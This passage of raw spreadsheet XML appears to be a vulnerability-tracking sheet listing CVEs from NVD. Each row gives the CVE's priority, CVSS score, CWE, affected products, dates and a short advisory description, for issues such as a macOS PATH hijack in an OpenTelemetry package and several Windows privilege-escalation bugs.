Medium</t></is></c><c r="B1021" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1021" s="5" t="inlineStr"><is><t>CVE-2026-81192</t></is></c><c r="D1021" s="5" t="n"><v>7</v></c><c r="E1021" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1021" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1021" s="5" t="inlineStr" /><c r="H1021" s="5" t="n"><v>0.001</v></c><c r="I1021" s="5" t="inlineStr" /><c r="J1021" s="5" t="inlineStr" /><c r="K1021" s="5" t="inlineStr" /><c r="L1021" s="5" t="inlineStr" /><c r="M1021" s="5" t="inlineStr" /><c r="N1021" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1021" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1021" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1021" s="5" t="inlineStr" /><c r="R1021" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S1021" s="5" t="inlineStr"><is><t>`OpenTelemetry.Resources.Host` NuGet package, which provides OpenTelemetry resource detectors for host, is affected by an untrusted search path vulnerability on macOS. Prior to version 1.16.0-beta.2, the `host.id` resource attribute detector launches the `sh` and `ioreg` executables by bare name rather than by absolute path, so both are resolved through the `PATH` environment variable. A local attacker who is less privileged than the host application, and who can influence `PATH` or write to a directory that appears in `PATH` ahead of the system directories, can have an arbitrary binary executed in the application's security context, resulting in local code execution/privilege escalation. This vulnerability only affect macOS hosts - Linux and Windows hosts are unaffected. Version 1.16.0-beta.2 contains a patch. No known workarounds are available.</t></is></c><c r="T1021" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t></is></c></row><row r="1022"><c r="A1022" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1022" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1022" s="5" t="inlineStr"><is><t>CVE-2026-81389</t></is></c><c r="D1022" s="5" t="n"><v>7</v></c><c r="E1022" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1022" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1022" s="5" t="inlineStr" /><c r="H1022" s="5" t="n"><v>0.004</v></c><c r="I1022" s="5" t="inlineStr" /><c r="J1022" s="5" t="inlineStr" /><c r="K1022" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1022" s="5" t="inlineStr" /><c r="M1022" s="5" t="inlineStr" /><c r="N1022" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1022" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1022" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1022" s="5" t="inlineStr" /><c r="R1022" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1022" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T1022" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81389</t></is></c></row><row r="1023"><c r="A1023" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1023" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1023" s="5" t="inlineStr"><is><t>CVE-2026-82062</t></is></c><c r="D1023" s="5" t="n"><v>7</v></c><c r="E1023" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1023" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1023" s="5" t="inlineStr" /><c r="H1023" s="5" t="n"><v>0.004</v></c><c r="I1023" s="5" t="inlineStr" /><c r="J1023" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1023" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1023" s="5" t="inlineStr" /><c r="M1023" s="5" t="inlineStr" /><c r="N1023" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1023" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1023" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1023" s="5" t="inlineStr" /><c r="R1023" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1023" s="5" t="inlineStr"><is><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is></c><c r="T1023" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t></is></c></row><row r="1024"><c r="A1024" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1024" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1024" s="5" t="inlineStr"><is><t>CVE-2026-83940</t></is></c><c r="D1024" s="5" t="n"><v>7</v></c><c r="E1024" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1024" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1024" s="5" t="inlineStr" /><c r="H1024" s="5" t="n"><v>0.002</v></c><c r="I1024" s="5" t="inlineStr" /><c r="J1024" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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24" s="5" t="inlineStr" /><c r="M1024" s="5" t="inlineStr" /><c r="N1024" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1024" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1024" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1024" s="5" t="inlineStr" /><c r="R1024" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1024" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1024" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t></is></c></row><row r="1025"><c r="A1025" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1025" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1025" s="5" t="inlineStr"><is><t>CVE-2026-83999</t></is></c><c r="D1025" s="5" t="n"><v>7</v></c><c r="E1025" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1025" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1025" s="5" t="inlineStr" /><c r="H1025" s="5" t="n"><v>0.002</v></c><c r="I1025" s="5" t="inlineStr" /><c r="J1025" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1025" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1025" s="5" t="inlineStr" /><c r="M1025" s="5" t="inlineStr" /><c r="N1025" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1025" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1025" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1025" s="5" t="inlineStr" /><c r="R1025" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1025" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1025" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t></is></c></row><row r="1026"><c r="A1026" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1026" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1026" s="5" t="inlineStr"><is><t>CVE-2026-85360</t></is></c><c r="D1026" s="5" t="n"><v>7</v></c><c r="E1026" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1026" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1026" s="5" t="inlineStr" /><c r="H1026" s="5" t="n"><v>0.002</v></c><c r="I1026" s="5" t="inlineStr" /><c r="J1026" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K102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26" s="5" t="inlineStr" /><c r="M1026" s="5" t="inlineStr" /><c r="N1026" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1026" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1026" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1026" s="5" t="inlineStr" /><c r="R1026" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1026" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1026" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t></is></c></row><row r="1027"><c r="A1027" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1027" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1027" s="5" t="inlineStr"><is><t>CVE-2026-86135</t></is></c><c r="D1027" s="5" t="n"><v>7</v></c><c r="E1027" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1027" s="5" t="inlineStr"><is><t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t></is></c><c r="G1027" s="5" t="inlineStr" /><c r="H1027" s="5" t="n"><v>0.002</v></c><c r="I1027" s="5" t="inlineStr" /><c r="J1027" s="5" t="inlineStr" /><c r="K1027" s="5" t="inlineStr" /><c r="L1027" s="5" t="inlineStr" /><c r="M1027" s="5" t="inlineStr" /><c r="N1027" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1027" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1027" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1027" s="5" t="inlineStr" /><c r="R1027" s="5" t="inlineStr"><is><t>CWE-352, CWE-400</t></is></c><c r="S1027" s="5" t="inlineStr"><is><t>A Cross-Site Request Forgery (CSRF) vulnerability in WatchGuard Dimension's database snapshot creation feature allows a remote attacker to trigger unauthorized snapshot creation by tricking an authenticated administrator into visiting a specially crafted web page.</t></is></c><c r="T1027" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86135</t></is></c></row><row r="1028"><c r="A1028" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1028" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1028" s="5" t="inlineStr"><is><t>CVE-2026-53933</t></is></c><c r="D1028" s="5" t="n"><v>6.9</v></c><c r="E1028" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1028" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1028" s="5" t="inlineStr" /><c r="H1028" s="5" t="n"><v>0.003</v></c><c r="I1028" s="5" t="inlineStr" /><c r="J1028" s="5" t="inlineStr" /><c r="K1028" s="5" t="inlineStr" /><c r="L1028" s="5" t="inlineStr" /><c r="M1028" s="5" t="inlineStr" /><c r="N1028" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1028" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1028" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1028" s="5" t="inlineStr" /><c r="R1028" s="5" t="inlineStr"><is><t>CWE-203</t></is></c><c r="S1028" s="5" t="inlineStr"><is><t>Maravel, a PHP framework oriented towards dependency injection, prior to version 10.73.1 has a side-channel information disclosure issue. When a route was compiled with dynamic placeholders (e.g., `/api/v1/users/{id}`), the raw string placeholder key was mistakenly registered into the flat static route checklist. An attacker scanning endpoints could intentionally pass the literal template syntax (e.g., `GET /api/v1/users/{id}`) to force an unexpected match against the static map. Because the dynamic tree engine was bypassed, no arguments were captured. This forced modern PHP 8+ versions to throw a native `ArgumentCountError`, resulting in a 500 Internal Server Error instead of a uniform 404 Not Found. By tracking which fuzz patterns exploded into a 500 error, a malicious actor could programmatically profile and map out internal route parameter names and controller schemas. Version 10.73.1 contains a patch. As a workaround, mitigate this side-channel leak by implementing a defensive check in a global middleware. This will reject any literal brace patterns before they reach the router engine.</t></is></c><c r="T1028" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53933</t></is></c></row><row r="1029"><c r="A1029" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1029" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1029" s="5" t="inlineStr"><is><t>CVE-2026-62652</t></is></c><c r="D1029" s="5" t="n"><v>6.9</v></c><c r="E1029" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1029" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G1029" s="5" t="inlineStr" /><c r="H1029" s="5" t="n"><v>0.002</v></c><c r="I1029" s="5" t="inlineStr" /><c r="J1029" s="5" t="inlineStr" /><c r="K1029" s="5" t="inlineStr" /><c r="L1029" s="5" t="inlineStr" /><c r="M1029" s="5" t="inlineStr" /><c r="N1029" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1029" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1029" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1029" s="5" t="inlineStr" /><c r="R1029" s="5" t="inlineStr"><is><t>CWE-215</t></is></c><c r="S1029" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The device firmware contains binaries from which debugging symbols have not been removed. This could allow an unauthenticated attacker with access to the publicly available firmware update files to more easily reverse engineer the device's firmware, facilitating the identification of further vulnerabilities.</t></is></c><c r="T1029" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62652</t></is></c></row><row r="1030"><c r="A1030" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1030" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1030" s="5" t="inlineStr"><is><t>CVE-2026-81531</t></is></c><c r="D1030" s="5" t="n"><v>6.9</v></c><c r="E1030" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1030" s="5" t="inlineStr"><is><t>f23511db-6c3e-4e32-a477-6aa17d310630</t></is></c><c r="G1030" s="5" t="inlineStr" /><c r="H1030" s="5" t="n"><v>0.004</v></c><c r="I1030" s="5" t="inlineStr" /><c r="J1030" s="5" t="inlineStr" /><c r="K1030" s="5" t="inlineStr" /><c r="L1030" s="5" t="inlineStr" /><c r="M1030" s="5" t="inlineStr" /><c r="N1030" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1030" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1030" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1030" s="5" t="inlineStr" /><c r="R1030" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="S1030" s="5" t="inlineStr"><is><t>An information
disclosure vulnerability has been identified in Omada Controller.  An API endpoint intended for Controller initialization
remains accessible after completion and may disclose account-related
information to unauthenticated remote users. 






Successful
exploitation may allow an attacker to remote query the affected endpoint that
may facilitate user enumeration and subsequent attacks targeting administrative
accounts.</t></is></c><c r="T1030" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81531</t></is></c></row><row r="1031"><c r="A1031" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1031" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1031" s="5" t="inlineStr"><is><t>CVE-2026-81823</t></is></c><c r="D1031" s="5" t="n"><v>6.9</v></c><c r="E1031" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1031" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G1031" s="5" t="inlineStr" /><c r="H1031" s="5" t="n"><v>0.002</v></c><c r="I1031" s="5" t="inlineStr" /><c r="J1031" s="5" t="inlineStr" /><c r="K1031" s="5" t="inlineStr" /><c r="L1031" s="5" t="inlineStr" /><c r="M1031" s="5" t="inlineStr" /><c r="N1031" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1031" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1031" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1031" s="5" t="inlineStr" /><c r="R1031" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1031" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow an unauthenticated miscreant to perform read operations intended only for PIMBoards users, resulting in information disclosure. Write operations are not impacted.</t></is></c><c r="T1031" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81823</t></is></c></row><row r="1032"><c r="A1032" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1032" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1032" s="5" t="inlineStr"><is><t>CVE-2026-86804</t></is></c><c r="D1032" s="5" t="n"><v>6.9</v></c><c r="E1032" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1032" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1032" s="5" t="inlineStr" /><c r="H1032" s="5" t="n"><v>0.004</v></c><c r="I1032" s="5" t="inlineStr" /><c r="J1032" s="5" t="inlineStr" /><c r="K1032" s="5" t="inlineStr" /><c r="L1032" s="5" t="inlineStr" /><c r="M1032" s="5" t="inlineStr" /><c r="N1032" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1032" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1032" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1032" s="5" t="inlineStr" /><c r="R1032" s="5" t="inlineStr"><is><t>CWE-266, CWE-285</t></is></c><c r="S1032" s="5" t="inlineStr"><is><t>A vulnerability was identified in seakee CPA-Manager-Plus up to 1.11.10. This vulnerability affects the function CPAResource of the file apps/manager-server/internal/http/controller/proxy/handler.go of the component HTTP Handler. The manipulation leads to improper authorization. It is possible to initiate the attack remotely. Upgrading to version 1.11.11 is able to resolve this issue. The identifier of the patch is 842eec791377ddcbea5cd639bc065eaa4801d656. It is suggested to upgrade the affected component.</t></is></c><c r="T1032" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86804</t></is></c></row><row r="1033"><c r="A1033" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1033" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1033" s="5" t="inlineStr"><is><t>CVE-2026-86810</t></is></c><c r="D1033" s="5" t="n"><v>6.9</v></c><c r="E1033" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1033" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1033" s="5" t="inlineStr" /><c r="H1033" s="5" t="n"><v>0.007</v></c><c r="I1033" s="5" t="inlineStr" /><c r="J1033" s="5" t="inlineStr" /><c r="K1033" s="5" t="inlineStr" /><c r="L1033" s="5" t="inlineStr" /><c r="M1033" s="5" t="inlineStr" /><c r="N1033" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1033" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1033" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1033" s="5" t="inlineStr" /><c r="R1033" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S1033" s="5" t="inlineStr"><is><t>A vulnerability was detected in Open-Web-Analytics up to 1.9.1. The impacted element is the function checkCapabilityAndAuthenticateUser of the file Core/Controller.php of the component Controller. Performing a manipulation results in improper authentication. The attack may be initiated remotely. Upgrading to version 1.10.0 is sufficient to resolve this issue. The patch is named 6fc91c49eebdb8bfdfeed71cb50a5d97eac70f24. It is advisable to upgrade the affected component.</t></is></c><c r="T1033" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86810</t></is></c></row><row r="1034"><c r="A1034" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1034" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1034" s="5" t="inlineStr"><is><t>CVE-2026-65812</t></is></c><c r="D1034" s="5" t="n"><v>6.8</v></c><c r="E1034" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1034" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1034" s="5" t="inlineStr" /><c r="H1034" s="5" t="n"><v>0.005</v></c><c r="I1034" s="5" t="inlineStr" /><c r="J1034" s="5" t="inlineStr" /><c r="K1034" s="5" t="inlineStr" /><c r="L1034" s="5" t="inlineStr" /><c r="M1034" s="5" t="inlineStr" /><c r="N1034" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1034" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1034" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1034" s="5" t="inlineStr" /><c r="R1034" s="5" t="inlineStr"><is><t>CWE-201</t></is></c><c r="S1034" s="5" t="inlineStr"><is><t>Insertion of sensitive information into sent data in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1034" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65812</t></is></c></row><row r="1035"><c r="A1035" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1035" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1035" s="5" t="inlineStr"><is><t>CVE-2026-68833</t></is></c><c r="D1035" s="5" t="n"><v>6.8</v></c><c r="E1035" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1035" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1035" s="5" t="inlineStr" /><c r="H1035" s="5" t="n"><v>0.003</v></c><c r="I1035" s="5" t="inlineStr" /><c r="J1035" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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5" s="5" t="inlineStr" /><c r="M1035" s="5" t="inlineStr" /><c r="N1035" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1035" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1035" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1035" s="5" t="inlineStr" /><c r="R1035" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1035" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T1035" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68833</t></is></c></row><row r="1036"><c r="A1036" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1036" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1036" s="5" t="inlineStr"><is><t>CVE-2026-69415</t></is></c><c r="D1036" s="5" t="n"><v>6.8</v></c><c r="E1036" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1036" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1036" s="5" t="inlineStr" /><c r="H1036" s="5" t="n"><v>0.007</v></c><c r="I1036" s="5" t="inlineStr" /><c r="J1036" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1036" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1036" s="5" t="inlineStr" /><c r="M1036" s="5" t="inlineStr" /><c r="N1036" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1036" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1036" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1036" s="5" t="inlineStr" /><c r="R1036" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1036" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows DHCP Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T1036" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69415</t></is></c></row><row r="1037"><c r="A1037" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1037" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1037" s="5" t="inlineStr"><is><t>CVE-2026-69490</t></is></c><c r="D1037" s="5" t="n"><v>6.8</v></c><c r="E1037" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1037" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1037" s="5" t="inlineStr" /><c r="H1037" s="5" t="n"><v>0.004</v></c><c r="I1037" s="5" t="inlineStr" /><c r="J1037" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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7" s="5" t="inlineStr" /><c r="M1037" s="5" t="inlineStr" /><c r="N1037" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1037" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1037" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1037" s="5" t="inlineStr" /><c r="R1037" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1037" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1037" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69490</t></is></c></row><row r="1038"><c r="A1038" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1038" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1038" s="5" t="inlineStr"><is><t>CVE-2026-69566</t></is></c><c r="D1038" s="5" t="n"><v>6.8</v></c><c r="E1038" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1038" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1038" s="5" t="inlineStr" /><c r="H1038" s="5" t="n"><v>0.004</v></c><c r="I1038" s="5" t="inlineStr" /><c r="J1038" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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8" s="5" t="inlineStr" /><c r="M1038" s="5" t="inlineStr" /><c r="N1038" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1038" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1038" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1038" s="5" t="inlineStr" /><c r="R1038" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1038" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T1038" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69566</t></is></c></row><row r="1039"><c r="A1039" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1039" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1039" s="5" t="inlineStr"><is><t>CVE-2026-71329</t></is></c><c r="D1039" s="5" t="n"><v>6.8</v></c><c r="E1039" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1039" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1039" s="5" t="inlineStr" /><c r="H1039" s="5" t="n"><v>0.003</v></c><c r="I1039" s="5" t="inlineStr" /><c r="J1039" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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9" s="5" t="inlineStr" /><c r="M1039" s="5" t="inlineStr" /><c r="N1039" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1039" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1039" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1039" s="5" t="inlineStr" /><c r="R1039" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1039" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T1039" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71329</t></is></c></row><row r="1040"><c r="A1040" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1040" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1040" s="5" t="inlineStr"><is><t>CVE-2026-71348</t></is></c><c r="D1040" s="5" t="n"><v>6.8</v></c><c r="E1040" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1040" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1040" s="5" t="inlineStr" /><c r="H1040" s="5" t="n"><v>0.004</v></c><c r="I1040" s="5" t="inlineStr" /><c r="J1040" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K104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40" s="5" t="inlineStr" /><c r="M1040" s="5" t="inlineStr" /><c r="N1040" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1040" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1040" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1040" s="5" t="inlineStr" /><c r="R1040" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1040" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="T1040" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71348</t></is></c></row><row r="1041"><c r="A1041" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1041" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1041" s="5" t="inlineStr"><is><t>CVE-2026-71349</t></is></c><c r="D1041" s="5" t="n"><v>6.8</v></c><c r="E1041" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1041" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1041" s="5" t="inlineStr" /><c r="H1041" s="5" 